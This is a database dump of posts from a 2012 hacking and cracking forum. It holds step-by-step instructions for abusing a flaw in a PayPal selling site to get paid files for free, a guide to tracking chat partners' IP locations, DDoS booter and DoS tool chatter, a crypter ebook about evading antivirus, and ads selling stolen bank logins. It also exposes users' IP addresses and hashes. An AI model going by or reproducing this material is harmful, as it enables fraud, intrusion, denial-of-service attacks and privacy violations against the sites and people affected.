'NXK', '1346256983', 'This, they are gone. I kinda like not having awards though. atleast for a month. It will keep people from award whoring and not stay HQ once they get the award they want.', '99.253.65.17', '1677541649', '0', '0', '0', '0', '1', 'dd0fce1bb279fdceebe831cad2f8ab79', '0', '0'); INSERT INTO mybb_posts VALUES('1329', '279', '1322', '3', 'RE: [Bug] Awards are gone', '0', '67', 'HoverCatz', '1346258614', 'Awards makes me feel like a \"Special user\". No awards makes me feel like a Normal member. Secondly, it makes all posts look better.', '178.74.56.137', '-1303758711', '1', '0', '0', '0', '1', '87986a730f0db81ea620ea83d7f52e2b', '0', '0'); INSERT INTO mybb_posts VALUES('1330', '191', '1326', '15', 'RE: ProDos v1.0', '0', '67', 'HoverCatz', '1346259075', '[quote=\'iTzIpod\' pid=\'1326\' dateline=\'1346256318\']\r\nI don\'t think it matters @sirchamp and @HoverCatz.\r\nIt still is a Dos that works.\r\n[/quote]\r\n\r\nThats correct, it does not matter. He was the one that quoted my first reply. I dont care what language its made in, only it works. And this works.\r\n\r\nIf you still believe its Not in gamemaker, check out: [url=http://www.youtube.com/watch?v=aotVqDGjx4Y]Here[/url]\r\nBe sure you read the comments. Some people also says its Gamemaker.', '178.74.56.137', '-1303758711', '1', '0', '0', '0', '1', '24879dd8195fe95b648f7f1cbf635503', '0', '0'); INSERT INTO mybb_posts VALUES('1331', '198', '713', '21', 'RE: [Tutorial] Setting up your own web Booter[Source Included]', '0', '67', 'HoverCatz', '1346259585', 'Hey, im hosting my booter on [url=www.godaddy.com]here[/url] and they are not Offshore. I guess im just lucky, or?', '178.74.56.137', '-1303758711', '1', '0', '0', '0', '1', 'e1975a855153fe4b386ff1879d5193b5', '0', '0'); INSERT INTO mybb_posts VALUES('1332', '29', '83', '15', 'RE: ???Italian DoS tool (Great for hitting sites offline)???', '0', '67', 'HoverCatz', '1346259799', '@iTzIpod\nWhen attacking a webpage, be sure you are able to go on other webpages at the same time, or ask a friend to check if the page really is down.', '178.74.56.137', '-1303758711', '1', '0', '0', '0', '1', 'cd8741a0eb0580df221a8b0cb2d43532', '0', '0'); INSERT INTO mybb_posts VALUES('1333', '11', '28', '15', 'RE: .EXE Booter Pack', '0', '67', 'HoverCatz', '1346259910', 'Hey. Do you still have the Shell checker? I have made one and released it on HF. Maybe its mine :P\n\n*Sorry for posting on old thread*', '178.74.56.137', '-1303758711', '1', '0', '0', '0', '1', '925854bafad39e607afa3e4042ebfeeb', '0', '0'); INSERT INTO mybb_posts VALUES('1334', '164', '484', '28', 'RE: Experiences on your upgrade..', '0', '84', 'Thunder™', '1346260857', 'This Forums have already many active members and activity is good\nI hope i will contribute more :).', '111.91.95.188', '1868259260', '0', '0', '0', '0', '1', '14d86b7b5e20b099942adb8365dddc84', '0', '0'); INSERT INTO mybb_posts VALUES('1335', '281', '0', '84', 'Upload N Sell Exploit', '0', '84', 'Thunder™', '1346261031', 'Upload N Sell is a site that allows you to sell things smoothly via PayPal\r\n\r\nThis exploit allows you to download the most recently purchased item for FREE\r\n\r\nVisit: http://uploadnsell.com/check-sale.php\r\nCopy the code that is displayed\r\nVisit: http://uploadnsell.com/download/\r\nPaste the code you copied after \"/download/\"\r\nDownload the file!\r\nPost thanks if u like this :).', '111.91.95.188', '1868259260', '0', '0', '0', '0', '1', '15c2d7d71e461a82c02b9aead27e9435', '0', '0'); INSERT INTO mybb_posts VALUES('1336', '282', '0', '55', '[Request] Youtube Accounts', '0', '84', 'Thunder™', '1346261212', 'Need some Youtube accounts for bots \r\nThanks in advance.', '111.91.95.188', '1868259260', '0', '0', '0', '0', '1', '0c902ee20e7e8ea18f114ca1381d2ab5', '0', '0'); INSERT INTO mybb_posts VALUES('1337', '283', '0', '14', 'Proxy List August 2012[Working]', '0', '84', 'Thunder™', '1346261697', 'Warning huge list\r\nThis is useful for using it with your bots \r\nEnjoy guys \r\nDownload Link :~ http://www.directmirror.com/files/0NNPMOCE', '111.91.95.188', '1868259260', '0', '0', '0', '0', '1', '9e9074b6c324545e39a7d3f938091b72', '0', '0'); INSERT INTO mybb_posts VALUES('1338', '284', '0', '7', 'Typing Speed Test', '0', '84', 'Thunder™', '1346261768', 'My typing speed\r\n\r\n[Img]http://speedtest.10fastfingers.com/badge/1_wpm_score_AN.png[/Img]\r\n\r\nVisit [url=http://speedtest.10fastfingers.com/]Typing speed[/url] and try !!!\r\n\r\nI suggest u all to check Out your typing Speed..', '111.91.95.188', '1868259260', '0', '0', '0', '0', '1', 'b1d559bbc86b5a44aa2adbfa87296ed5', '0', '0'); INSERT INTO mybb_posts VALUES('1339', '285', '0', '12', 'How to track location of person on any chat box', '0', '84', 'Thunder™', '1346261829', 'How to track location of person on any chat box\r\nHow to Track an other person on facebook chat room\r\nWe will be track person by Location tracking codes, which you present in chat room\r\nland on page with good pictures. meanwhile, the other chat buddy\'s IP Address is stored in a database. IP Look Up identify\r\nCountry, Near city, Local time, etc.. of the other buddy.\r\n\r\n[color=#FF0000]Step 1 :~[/color] First of all Sign in on [color=#1E90FF][url=http://www.chatrack.frihost.net]Click Here[/url][/color]\r\n\r\n[color=#FF0000]Step 2 :~[/color] Click on any one Landing page preview picture.\r\n\r\nfrom bottom of this page\r\n\r\nSelect, \'Copy\' (ctrl+C) \'Tracking Code\' from that\r\n\r\npage.\r\n\r\n[color=#FF0000]Step 3 :~[/color]When you are in Live Chat with a buddy, Paste the track code in IM text box.\r\n\r\nAsk your chat buddy to click and see the \'Picture\'\r\n\r\n[color=#FF0000]Step 4 :~[/color]Give your chat buddy a little time to click and watch the \'picture\'.\r\n\r\nNow, click Track Result in \"this page\" and see your buddy\'s Location.', '111.91.95.188', '1868259260', '0', '0', '0', '0', '1', '88a722ce2af67fb8761d7ae3640133a3', '0', '0'); INSERT INTO mybb_posts VALUES('1340', '249', '1057', '56', 'RE: Last person to reply, wins!', '0', '55', 'Baws', '1346262749', 'It is official guys... I won', '98.176.49.100', '1655714148', '0', '0', '0', '0', '1', '100238189b9348ba7fbcdfd682289b7e', '0', '0'); INSERT INTO mybb_posts VALUES('1341', '265', '1184', '3', 'RE: Apathy Demoted', '0', '55', 'Baws', '1346262847', 'Too many people that don\'t know what grammar is in this thread...', '98.176.49.100', '1655714148', '0', '0', '0', '0', '1', 'a0558e6af33c220b9f6de8578a3baf49', '0', '0'); INSERT INTO mybb_posts VALUES('1342', '277', '1318', '11', 'RE: Any phreaking tutorials?', '0', '141', 'Bane™', '1346263823', '[quote=\'NXK\' pid=\'1318\' dateline=\'1346255675\']\r\nThere\'s alot of youtube videos that will show you the best things you can do with a rooted android like over clocking it, things like that.\r\n[/quote]\r\n\r\nI don\'t mean overclocking and all of that, cause I already did that. What I mean is methods to setup bot-nets through your android I know it\'s possible. I already have an app that pulls cookies on the network on that gives you access to what anyone is browsing at that moment.', '72.134.24.117', '1216747637', '0', '0', '0', '0', '1', '0e0144d937049233f4b84f314b3f7016', '0', '0'); INSERT INTO mybb_posts VALUES('1344', '279', '1322', '3', 'RE: [Bug] Awards are gone', '0', '1', 't3h jok3r', '1346270963', 'Please have a look at the thread below.\n\nhttp://l33thacking.com/showthread.php?tid=286', '41.174.3.249', '699270137', '1', '0', '0', '0', '1', 'aaa0abc8146f3a9b5445748097ded41f', '0', '0'); INSERT INTO mybb_posts VALUES('1345', '281', '1335', '84', 'RE: Upload N Sell Exploit', '0', '67', 'HoverCatz', '1346273943', 'Thanks! :)', '178.74.56.137', '-1303758711', '1', '0', '0', '0', '1', 'c922602c92eb0a57dd4d03c644f08b19', '0', '0'); INSERT INTO mybb_posts VALUES('1346', '282', '1336', '55', 'RE: [Request] Youtube Accounts', '0', '82', 'iTzIpod', '1346287917', 'Can you give me an estimate of how much\n\nJust get a Youtube Account Creator bot and then use those? It\'s really fast, simple, and easy.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'a4527714845b48ba5be16d0bae53477f', '0', '0'); INSERT INTO mybb_posts VALUES('1347', '286', '1343', '3', 'RE: [Announcement] Awards and IP Log History Features', '0', '82', 'iTzIpod', '1346288091', 'Alright. Thanks for the notice. :/', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'b9d74b94abe37480d5d3d61485c562fb', '0', '0'); INSERT INTO mybb_posts VALUES('1348', '281', '1335', '84', 'RE: Upload N Sell Exploit', '0', '2', 'Apathy', '1346288421', 'Quite old now thanks anyway.', '173.206.130.181', '-1378975051', '0', '0', '0', '0', '1', '97612c82103bdcf95ad0678077bbd93d', '0', '0'); INSERT INTO mybb_posts VALUES('1349', '249', '1057', '56', 'RE: Last person to reply, wins!', '0', '54', 'Sin Cara', '1346289880', '[quote=\'iTzIpod\' pid=\'1057\' dateline=\'1345991527\']\r\nTitle says it all. \r\nWhoever is the last person to reply to this thread, wins!\r\n[/quote]\r\n\r\nlol...it\'s your HQ post...?', '119.154.68.67', '2006598723', '1', '0', '0', '0', '1', 'e7d7111036dd9a9ef09339b2805dd465', '0', '0'); INSERT INTO mybb_posts VALUES('1350', '249', '1057', '56', 'RE: Last person to reply, wins!', '0', '82', 'iTzIpod', '1346292031', 'Oh dang! I just won!', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'a9c8dfc86cf6748fdc914554b41fb213', '0', '0'); INSERT INTO mybb_posts VALUES('1351', '286', '1343', '3', 'RE: [Announcement] Awards and IP Log History Features', '0', '55', 'Baws', '1346293473', 'I was wondering what the problem was...', '98.176.49.100', '1655714148', '0', '0', '0', '0', '1', '6ba45caee88a736b97878cab3d233176', '0', '0'); INSERT INTO mybb_posts VALUES('1352', '287', '0', '41', 'steam account', '0', '84', 'Thunder™', '1346300993', 'Start Bid: $15.00\r\nBuy It Now: $3w00.00\r\nEnd Date: (when I see a good price)\r\nPayment Method :~ LR.\r\nGames:\r\nhttp://imgur.com/eEooq\r\nShoot me a pm if ur intrested in buying :)', '111.91.75.51', '1868254003', '0', '0', '0', '0', '1', '4b6f8c01566229462dde0d3dd58d7735', '0', '0'); INSERT INTO mybb_posts VALUES('1353', '288', '0', '19', '[Junk]Joker delete this', '0', '67', 'HoverCatz', '1346331326', 'Sorry, posted in wrong section.', '178.74.56.137', '-1303758711', '1', '0', '67', '1346331627', '1', '2eceef6983961bade2fce39cab94857c', '0', '1346331627'); INSERT INTO mybb_posts VALUES('1354', '289', '0', '15', 'UploadNSell Exploit Program', '0', '67', 'HoverCatz', '1346331650', '[b]Hey. Thanks to [url=http://l33thacking.com/member.php?action=profile&uid=84]Thunder™[/url] i got the idea of making this program.[/b]\n\n[u][b]Download:[/b][/u]\n[lock][url=http://www.sendspace.com/file/d2g6ie][color=#1E90FF]Click Here[/color][/url][/lock]\n\n[u][b]Image:[/b][/u]\n[img]http://gyazo.com/be9fecb59998a9a80a334c66d225b915.png[/img]\n\n[u][b]Your rights:[/b][/u]\n[color=#32CD32]You are allowed to download and use this program.[/color]\n[color=#FF0000]You do not have my rights to decompile this, and use the way i did code it. Only if i ever share the code with you.[/color]\n\nNOTE: I may post updates with some new stuff on it later.', '178.74.56.137', '-1303758711', '1', '0', '1', '1352011902', '1', '45c58e7bf01d71a14b37e93a4686e9ff', '0', '1352011902'); INSERT INTO mybb_posts VALUES('1355', '288', '1353', '19', '[Junk]Joker delete this', '0', '20', 'JakeUS', '1346340893', 'This thread has been junked.', '24.59.243.229', '406582245', '1', '0', '0', '0', '1', '', '0', '0'); INSERT INTO mybb_posts VALUES('1356', '141', '368', '9', 'RE: $30 per day ? Ne invest ? Do nothing ? Autopilot ? Very Easy ?', '0', '48', 'BurnsH4X', '1346342033', 'i think the ads from refreshing dont count anymore', '46.11.42.121', '772483705', '0', '0', '0', '0', '1', 'c291e952aaeb15b41bfb2edf6316b485', '0', '0'); INSERT INTO mybb_posts VALUES('1357', '281', '1335', '84', 'RE: Upload N Sell Exploit', '0', '82', 'iTzIpod', '1346348557', 'I\'ve seen this a couple times. But never tried it until now. Just downloaded a .txt file of a way to get free 1 month XBL.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'adb116fcaf9dbd26fd50443dcd9c1c7c', '0', '0'); INSERT INTO mybb_posts VALUES('1358', '290', '0', '19', '[Junk][Junk]Our service is specialized on USA and CANADA dumps, but EUROPE/ASIA/WORLD dumps also', '0', '6', 'services', '1346348794', 'BANK LOGINS FOR SALE\r\nUK BANK LOGIN IN STOCK:\r\n \r\nAbbey Fresh // Alliance & Leicester // CapitalOne Bank\r\nHSBC UK // Halifax UK // LLOYDS\r\n \r\nUSA BANK LOGIN IN STOCK:\r\nBank Of America // CHASE // WELLSFARGO\r\nCITI BANK// HSBC// WACHOVIA\r\n.....................................................................................\r\n\r\nEmail : notion_services@ymail.com\r\n\r\n \r\nYm : notion_services@ymail.com\r\n \r\nIcq : 600980136\r\n \r\nReply with Quote', '208.100.56.10', '-798738422', '0', '0', '0', '0', '1', '9a75347d9440b12b764fe5eeb640e865', '0', '0'); INSERT INTO mybb_posts VALUES('1359', '291', '0', '19', '[Junk]BANK LOGINS FOR SALE UK BANK LOGIN IN STOCK: Abbey Fresh // Alliance & Leicester //', '0', '6', 'services', '1346349114', 'BANK LOGINS FOR SALE\r\nUK BANK LOGIN IN STOCK:\r\n \r\nAbbey Fresh // Alliance & Leicester // CapitalOne Bank\r\nHSBC UK // Halifax UK // LLOYDS\r\n \r\nUSA BANK LOGIN IN STOCK:\r\nBank Of America // CHASE // WELLSFARGO\r\nCITI BANK// HSBC// WACHOVIA\r\n.....................................................................................\r\n\r\nEmail : notion_services@ymail.com\r\n\r\n \r\nYm : notion_services@ymail.com\r\n \r\nIcq : 600980136\r\n \r\nReply with Quote', '208.100.56.10', '-798738422', '0', '0', '0', '0', '1', '01eae0526cdd8eea234901b75e589e2f', '0', '0'); INSERT INTO mybb_posts VALUES('1360', '284', '1338', '7', 'RE: Typing Speed Test', '0', '82', 'iTzIpod', '1346350445', 'My result:\n[img]http://i.imgur.com/9NgIT.png[/img]', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'e5d3e0428abc7af0f8693b0c62b78845', '0', '0'); INSERT INTO mybb_posts VALUES('1361', '284', '1338', '7', 'RE: Typing Speed Test', '0', '1', 't3h jok3r', '1346366788', 'This is my result.\n\n[img]http://10fastfingers.com/speedtests/generate_screenshot_result/60_304_0_0_56_1_82.87_14282_83395[/img]', '41.174.16.235', '699273451', '1', '0', '0', '0', '1', 'be0aa58b8194d8fb527a91bfbef99772', '0', '0'); INSERT INTO mybb_posts VALUES('1364', '294', '0', '16', 'How to se pringles,monster,hersheys,duracell and stride', '0', '154', 'fap', '1346370620', 'Method on how to se pringles,monster,hersheys,duracell and stride :).\r\n\r\n\r\ndownload: http://www.mediafire.com/view/?oipiqzaphzdave8\r\n\r\nenjoy ! :).', '92.234.104.156', '1558866076', '0', '0', '0', '0', '1', 'cce0b72416b44c7d795f90e911031847', '0', '0'); INSERT INTO mybb_posts VALUES('1365', '234', '977', '17', 'RE: Free E-Whoring packs website plus free PORN', '0', '154', 'fap', '1346370730', 'I\'d like this :).\n\nthanks in advance brother.', '92.234.104.156', '1558866076', '0', '0', '0', '0', '1', 'acc60fb9c5c674ea8eed6b3099ac443b', '0', '0'); INSERT INTO mybb_posts VALUES('1366', '289', '1354', '15', 'RE: UploadNSell Exploit Program', '0', '1', 't3h jok3r', '1346372788', 'Thanks for the program, I didn\'t know about this thing before. Thanks to Thunder for letting us know about this website.', '41.174.6.118', '699270774', '1', '0', '0', '0', '1', '82623c578d70449c354055cebebc1343', '0', '0'); INSERT INTO mybb_posts VALUES('1367', '270', '1228', '7', 'RE: Hi everyone', '0', '5', 'Timmy', '1346373289', 'Welcome back to LH. How is your college going?', '41.174.6.118', '699270774', '1', '0', '0', '0', '1', '0fba460cc51cf69b86f9cc71b36d8143', '0', '0'); INSERT INTO mybb_posts VALUES('1368', '295', '0', '59', '[ebook] Crypter Blueprint', '0', '5', 'Timmy', '1346373955', 'Well Hello LH,\n\nI had this for a while now and I am thinking to give this PDP out. It has one of the best methods to make your crypter FUD.\n\n[align=center][img]https://d3e94wzv4dpoqy.cloudfront.net/g2/cc6fd247626c019d5bedba2f5fcc8361_g2.png[/img][/align]\n\n[align=center][b](some table of contents)[/b]\n\" What really is a crypter? All the Core Fundamentals\n\" Types and Forms of Crypters\n\" Most Common Questions about Crypters – Answered\n\" The #1 most imporant factors you should know about Crypters\n\" The Antivirus vs Crypter Concept\n\" What to always keep in mind when making an FUD Crypter\n\" Vb6 and Crypters\n\" Vb6 fundamentals\n\" basic vb6 outline for creating a crypter\n\" vb6 Crypter techniques blueprint\n\" vb6 what to do and what not to do\n\" The Antivirus Signatures Concept\n\" Finding and pinpointing Whats causing detection\n\" The Universal Undetection Process\n\" tools and automation\n\" What you will learn from Undetecting Crypters\n\" keeping your Crypters undetected[/align]\n\n[u][color=#32CD32]Virus Scan[/color]:[/u]\n[spoiler][url=http://www.virustotal.com/file-scan/report.html?id=e41194cb34ac6c19fc707c833fcfe9007240f43cc509ed243cc28a7b270d898d-1309201818]Virus Total[/url][/spoiler]\n\n\n[u][color=#32CD32]Download Link[/color]:[/u]\n[spoiler][url=http://adf.ly/1w0KG]Download Link[/url][/spoiler]\n\n\nBy the way there is a password on the PDF file. I have provided the password therefore you guys wont have any trouble.\n\nHope you like this.', '41.174.6.118', '699270774', '1', '0', '1', '1346720213', '1', '67c07b2a51de7f33d82da68df3d56c03', '0', '1346720213'); INSERT INTO mybb_posts VALUES('1371', '270', '1228', '7', 'RE: Hi everyone', '0', '55', 'Baws', '1346382075', 'I just have to...\nIt\'s \"I\'ve\" not \"Iv\", I think you need to know that before college. :)', '98.176.49.100', '1655714148', '0', '0', '61', '1346383211', '1', 'f57a84e31884f0373066728f1253c08d', '0', '1346383211'); INSERT INTO mybb_posts VALUES('1372', '289', '1354', '15', 'RE: UploadNSell Exploit Program', '0', '2', 'Apathy', '1346382239', 'There is allready a multitude out but thanks nonetheless. Also you should make it filter out the spam ones. Such as the Dota key txt and the cracker that is actually a rat. Did you guys only find out about this now?', '173.206.137.22', '-1378973418', '0', '0', '0', '0', '1', '55c47da957f3d4e8c27c7aecc017b214', '0', '0'); INSERT INTO mybb_posts VALUES('1373', '296', '0', '55', '[Req] 50 Cents paypal', '0', '61', 'NXK', '1346383149', 'I need 50 cents paypal for a new sweater.. I don\'t want to take funds out of my bank for 50 cents and wait how ever long it takes.\r\n\r\nif you could help me out ill forever be your bitch.', '99.253.65.17', '1677541649', '0', '0', '0', '0', '1', '77550769ab942a6fe26b4e5672b09355', '0', '0'); INSERT INTO mybb_posts VALUES('1374', '270', '1371', '7', 'RE: Hi everyone', '0', '61', 'NXK', '1346383217', '[quote=\'Baws\' pid=\'1371\' dateline=\'1346382075\']\r\nI just have to...\r\nIt\'s \"I\'ve\" not \"Iv\", I think you need to know that before college. :)\r\n[/quote]\r\n\r\nGood thing i\'m in school for welding. Not anything to do with English.', '99.253.65.17', '1677541649', '0', '0', '0', '0', '1', '52d1bfff75e77393909a7778ead2937b', '0', '0'); INSERT INTO mybb_posts VALUES('1375', '296', '1373', '55', 'RE: [Req] 50 Cents paypal', '0', '82', 'iTzIpod', '1346384327', 'Make a new paypal, and then PM me the Email. And I will send you .50 cents.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '18ecc4b140e96ba188a3cad592a6028b', '0', '0'); INSERT INTO mybb_posts VALUES('1376', '289', '1354', '15', 'RE: UploadNSell Exploit Program', '0', '82', 'iTzIpod', '1346384804', 'Nice program. I will check it out tomorrow morning and will share my results. (;', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'dfd065aee54223e518cc2ffe540aa6dd', '0', '0'); INSERT INTO mybb_posts VALUES('1377', '297', '0', '7', 'My new Work', '0', '54', 'Sin Cara', '1346388713', 'I just launched my new community.... if you wana see and join, please PM me... i will send you link.', '119.154.50.168', '2006594216', '1', '0', '0', '0', '1', 'e5a124e027777217ffa0ecfa4c88c2da', '0', '0'); INSERT INTO mybb_posts VALUES('1378', '289', '1354', '15', 'RE: UploadNSell Exploit Program', '0', '84', 'Thunder™', '1346388941', 'Wow Thats Great Thanks For Program :)', '111.91.75.197', '1868254149', '0', '0', '0', '0', '1', 'be73940d56ca53afe518497a3b5d3b8b', '0', '0'); INSERT INTO mybb_posts VALUES('1379', '195', '688', '39', 'RE: [Selling] Cheap Netflix Accounts', '0', '112', '??????Z', '1346392478', 'i will buy one so you can have a vouch :). send me a pm with the pay pal email.', '92.22.246.107', '1545008747', '0', '0', '0', '0', '1', '0d0166b3ea961ec3a2d0381cbcd96f77', '0', '0'); INSERT INTO mybb_posts VALUES('1380', '227', '920', '13', 'RE: hack twitter?', '0', '150', 'MinecraftGeek', '1346417520', 'What is his twitter username?', '86.161.179.151', '1453437847', '0', '0', '0', '0', '1', '7826207bfcf066f14387c5531ad0314a', '0', '0'); INSERT INTO mybb_posts VALUES('1381', '294', '1364', '16', 'RE: How to se pringles,monster,hersheys,duracell and stride', '0', '150', 'MinecraftGeek', '1346417570', 'Thanks fap :D\nIs there any proof of this working for you though?\nThis seems very saturated and it is an old method.', '86.161.179.151', '1453437847', '0', '0', '0', '0', '1', '6aebe08e1bd67831527716614d1fc4a6', '0', '0'); INSERT INTO mybb_posts VALUES('1382', '283', '1337', '14', 'RE: Proxy List August 2012[Working]', '0', '150', 'MinecraftGeek', '1346417623', 'Proxy.org is literately a proxy list with hotlinks.', '86.161.179.151', '1453437847', '0', '0', '0', '0', '1', 'ca4911d5281417a9ec2a30770a4af5a9', '0', '0'); INSERT INTO mybb_posts VALUES('1383', '298', '0', '9', '???[EASY] LH\'s #1 WAY TO EARN MONEY GUARANTEED [EASY]???', '0', '159', 'Victori0us', '1346419973', '[u][b]Accidentally Closed other thread.[/b][/u]\r\n\r\nHello, today im sharing my well written ebook on how to make money. ive been advised by multiply people to \"close my thread and sell your ebook!\" but i am an extremely generous and selfless person and want to give it out free! Over 100+ user have been using the method i have help them with. I am glad to say 100% of them have found success.\r\nMy method is 1) easy, it takes only minutes to set up and start earning. 2) fast in a matter of days you can earn lots of cash. 3) this is not bullshit it includes[b][size=medium]\r\nNO surveys, $hitcash, and NO BULLSHIT[/size][/b]\r\n\r\nThis is fully auto pilot and requires no work except for the reading the ebook and setting up. [b]it also does not require you to invest anything 100% free[/b] You can earn $900 a month doing the slowest version of this method possible.\r\n\r\n[b]How do i get it?[/b]\r\nPost here and ill PM you with the download link. (direct download, media fire) Feel free to PM me [b]IN ADDITION to posting.[/b]\r\n\r\nFeel free to PM me with any questions.\r\n\r\nVirusTotal scan:\r\n[Spoiler]\r\nFor anyone worried about being infected form a PDF\r\n\r\n[img]http://i.imgur.com/vTRDz.png[/img]\r\n[/Spoiler]', '65.27.123.23', '1092320023', '0', '0', '1', '1346457391', '1', '318cb42849d5be2b477cd3bec75c2d89', '0', '1346457391'); INSERT INTO mybb_posts VALUES('1384', '294', '1364', '16', 'RE: How to se pringles,monster,hersheys,duracell and stride', '0', '82', 'iTzIpod', '1346422718', 'Agreed with MinecraftGeek. Have you ever tried this method?', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '246096d56b939422f34af3c50c246545', '0', '0'); INSERT INTO mybb_posts VALUES('1385', '298', '1383', '9', 'RE: ???[EASY] HF\'s #1 WAY TO EARN MONEY GUARANTEED [EASY]???', '0', '53', 'sirchamp', '1346422817', 'Can I have the file ? Thanks in Advance', '188.155.56.90', '-1130678182', '1', '0', '0', '0', '1', 'fec400829ca98837eafdf1e9524b6cfd', '0', '0'); INSERT INTO mybb_posts VALUES('1386', '186', '638', '16', 'RE: SE razor?', '0', '82', 'iTzIpod', '1346422829', '@@SSASIN, I can help you. Just message me on Skype. And then I will reply.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'dcf28156c176b525dff5f1d188a4bb80', '0', '0'); INSERT INTO mybb_posts VALUES('1387', '253', '1106', '56', 'RE: Count to 200', '0', '84', 'Thunder™', '1346436728', '14 Go Go Go\nWe need 200 posts', '111.91.75.152', '1868254104', '0', '0', '0', '0', '1', '3f9cff4674c022d1c6f9b646eee28c1c', '0', '0'); INSERT INTO mybb_posts VALUES('1388', '266', '1186', '47', 'RE: Win a Free Netflix Account~', '0', '53', 'sirchamp', '1346441999', 'Ill take number 2 I hope I will win', '188.155.56.90', '-1130678182', '1', '0', '0', '0', '1', '3058b1b0a7049fed610bcf10278488a1', '0', '0'); INSERT INTO mybb_posts VALUES('1389', '286', '1343', '3', 'RE: [Announcement] Awards and IP Log History Features', '0', '1', 't3h jok3r', '1346456987', 'No problem. It\'s better to announce the problem instead of answering 10+ threads.', '41.151.148.202', '697799882', '1', '0', '0', '0', '1', '14a758f4772a9b8d9b655ee072466acd', '0', '0'); INSERT INTO mybb_posts VALUES('1390', '297', '1377', '7', 'RE: My new Work', '0', '1', 't3h jok3r', '1346457465', 'If it\'s not related to Hacking and Cracking then you are allowed to advertise it publicly.', '41.151.148.202', '697799882', '1', '0', '0', '0', '1', 'c08c9aeef707c09da88e36c414dea30d', '0', '0'); INSERT INTO mybb_posts VALUES('1391', '253', '1106', '56', 'RE: Count to 200', '0', '1', 't3h jok3r', '1346457499', '15 because we have a new Admin.', '41.151.148.202', '697799882', '1', '0', '0', '0', '1', 'e4a333aa9fc1afeb206f214659a9d022', '0', '0'); INSERT INTO mybb_posts VALUES('1392', '195', '688', '39', 'RE: [Selling] Cheap Netflix Accounts', '0', '82', 'iTzIpod', '1346458283', '@Kennerz, you can message me on Skype.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'f3ae3c71a5b16582175e28a573eb2140', '0', '0'); INSERT INTO mybb_posts VALUES('1393', '266', '1186', '47', 'RE: Win a Free Netflix Account~', '0', '82', 'iTzIpod', '1346458355', 'Added @sirchamp', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'cdaece7cbff332ecbb3fee193bd30c7e', '0', '0'); INSERT INTO mybb_posts VALUES('1394', '298', '1383', '9', 'RE: ???[EASY] LH\'s #1 WAY TO EARN MONEY GUARANTEED [EASY]???', '0', '82', 'iTzIpod', '1346458442', 'May I have a direct link to the file? Thanks in advance.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '50fa5b4919e2d69b085805dabd2a09cb', '0', '0'); INSERT INTO mybb_posts VALUES('1395', '297', '1377', '7', 'RE: My new Work', '0', '82', 'iTzIpod', '1346458522', 'Alright. I\'ll PM you', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '9bea61383e42a695e81f18dc657ce33a', '0', '0'); INSERT INTO mybb_posts VALUES('1396', '253', '1391', '56', 'RE: Count to 200', '0', '82', 'iTzIpod', '1346458674', '[quote=\'t3h jok3r\' pid=\'1391\' dateline=\'1346457499\']\r\n15 because we have a new Admin.\r\n[/quote]\r\n\r\n16. What do you mean we have a new Admin? :o Who is it?', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '4184affb03fad44f7a5a32838fe479dd', '0', '0'); INSERT INTO mybb_posts VALUES('1397', '299', '0', '3', 'Apathy Promoted!!!', '0', '1', 't3h jok3r', '1346458710', 'Apathy was brought back as an Admin, because I felt that he deserved another chance and honestly he is going through a bad time and if I was in his shoes I believe I would have done the same.', '41.151.134.19', '697796115', '1', '0', '0', '0', '1', '0dec0257b2aa0cd9a6093b36aae4c3c9', '0', '0'); INSERT INTO mybb_posts VALUES('1398', '299', '1397', '3', 'RE: Apathy Promoted!!!', '0', '82', 'iTzIpod', '1346458860', 'I don\'t know about this..\n\n\nBut in other words, Good Luck + Congratulations Apathy. Don\'t blow it this time.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '49cd528732665cca3093944116718345', '0', '0'); INSERT INTO mybb_posts VALUES('1399', '300', '0', '4', 'Whats up', '0', '162', 'Dingus', '1346458881', 'I\'m from HF originally but, I decided to come here to learn how to SE :)\r\nGreetings everyone, if you need help with rats, crypting, and [b][u]some[/u][/b] website shit, hit me up.', '209.188.74.94', '-776189346', '0', '0', '0', '0', '1', 'd6ee7327bc12ed60560a1e7334ce068a', '0', '0'); INSERT INTO mybb_posts VALUES('1400', '300', '1399', '4', 'RE: Whats up', '0', '82', 'iTzIpod', '1346458923', 'Welcome to the forum Dingus. Enjoy your stay.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '47c46b3aa5891a955d6630493a606894', '0', '0'); INSERT INTO mybb_posts VALUES('1401', '298', '1383', '9', 'RE: ???[EASY] LH\'s #1 WAY TO EARN MONEY GUARANTEED [EASY]???', '0', '162', 'Dingus', '1346459502', 'I\'d like to check this out, thanks mate :)', '209.188.74.94', '-776189346', '0', '0', '0', '0', '1', '0f78e1fe35fa4c4c899cbc3a27cc8c4c', '0', '0'); INSERT INTO mybb_posts VALUES('1402', '253', '1106', '56', 'RE: Count to 200', '0', '162', 'Dingus', '1346459591', '17.\nBecause I\'m new here and feel like counting this twords my post count! hah.', '209.188.74.94', '-776189346', '0', '0', '0', '0', '1', 'bd02fd536b70cc65af77f46e42f3becb', '0', '0'); INSERT INTO mybb_posts VALUES('1403', '262', '1171', '43', 'RE: Amazon Receipt Generator V.2', '0', '1', 't3h jok3r', '1346459638', 'They are slow but they are extremely easy to SE.', '41.151.134.19', '697796115', '1', '0', '0', '0', '1', '75e8b0ccec79e115a1229de28e97af73', '0', '0'); INSERT INTO mybb_posts VALUES('1404', '301', '0', '25', 'Is keyscrambler good?', '0', '4', 'Triple H', '1346460501', 'I heard keyscrambler encrypts all your keystrokes and send it to the hacker if someone infected you with a RAT or Keylogger so I was wondering if it really works?', '41.151.168.124', '697804924', '1', '0', '0', '0', '1', 'fb403fc3326bca0c28f899cf65c2a7fd', '0', '0'); INSERT INTO mybb_posts VALUES('1405', '302', '0', '53', 'Java DoS Script', '0', '4', 'Triple H', '1346460658', '[color=#FF0000]I am not responsible for what you do with this 